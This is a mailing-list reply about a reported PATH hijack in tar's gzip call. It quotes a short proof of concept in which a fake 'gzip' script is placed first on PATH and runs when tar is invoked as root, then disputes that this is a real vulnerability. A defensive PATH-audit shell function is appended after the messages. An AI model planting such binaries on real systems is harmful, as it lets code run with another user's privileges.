Re: Path Hijack vulnerability
From: Michał Górny
Subject: Re: Path Hijack vulnerability
Date: Wed, 03 Nov 2021 18:43:48 +0100
User-agent: Evolution 3.42.0

On Wed, 2021-11-03 at 15:21 +0100, Gregorio Giacobbe wrote:
> Hi!
>
> As per subject, I discovered a Path Hijack vulnerability in the tar binary.
> When using the -z switch for gzip compression/decompression the binary calls
> “gzip” without absolute path, hence allowing the path Hijack.
> While this, in a normal scenario, can be totally harmless, it can be used as a
> privileged escalation technique when the tar binary is called as root user.
>
> Following lines will provide a basic PoC:
> ----
> export PATH=$(pwd):$PATH
> echo -e '#!/bin/bash\ntouch /tmp/tarred' > gzip
> chmod +x gzip
> touch file.txt
> tar -zcf backup.tar.gz file.txt
> ls -la /tmp/tarred
> -rw-r--r-- 1 root root 0 Nov 3 14:05 /tmp/tarred
> ----
>
> I have not tested switches for other compression/decompression formats, so
> there is a chance that they can be used as well as gzip.
>
Do you realize that if you have sufficient access to inject "gzip", you
may inject "tar" as well, right?
--
Best regards,
Michał Górny
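
A defender-side check for the condition both messages turn on: whether a directory that another user controls sits on the search path at or ahead of the entry that provides the binary. This is an added example, not part of either message; `path_audit`, its output format and the trusted-uid argument are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: audit how a command name resolves through PATH.
# Usage: path_audit CMD [PATH_STRING] [TRUSTED_UID]
# Walks PATH in lookup order up to the entry that provides CMD and prints an
# UNSAFE line for every entry on the way in which another user could plant a
# file. Returns 0 if clean, 1 if any entry is unsafe, 2 if CMD is not found.
path_audit() {
    cmd=$1
    rest=${2-$PATH}:          # trailing ':' so the last entry is consumed too
    trusted=${3-0}            # uid allowed to own PATH directories (root)
    bad=0
    while [ -n "$rest" ]; do
        dir=${rest%%:*}
        rest=${rest#*:}
        case $dir in
            /*) ;;
            *)  echo "UNSAFE '$dir': empty or relative entry, resolved against the cwd"
                bad=1
                dir=${dir:-.} ;;   # an empty entry means the current directory
        esac
        if [ -d "$dir" ]; then
            # -L follows symlinks, -n prints the numeric owner in field 3
            set -- $(ls -ldnL "$dir")
            mode=$1 owner=$3
            [ "$owner" = "$trusted" ] ||
                { echo "UNSAFE $dir: owned by uid $owner"; bad=1; }
            case $mode in
                ?????w*|????????w*)   # group-write or other-write bit set
                    echo "UNSAFE $dir: group- or world-writable ($mode)"; bad=1 ;;
            esac
        fi
        if [ -f "$dir/$cmd" ] && [ -x "$dir/$cmd" ]; then
            echo "RESOLVED $dir/$cmd"
            return $bad
        fi
    done
    echo "NOTFOUND $cmd"
    return 2
}

# Constructed demo: the PATH shape from the PoC, current directory first.
path_audit gzip "$(pwd):$PATH" || true
```

Running the same audit for `tar` covers the point made in the reply: an entry that is unsafe for `gzip` is unsafe for every command resolved through that PATH.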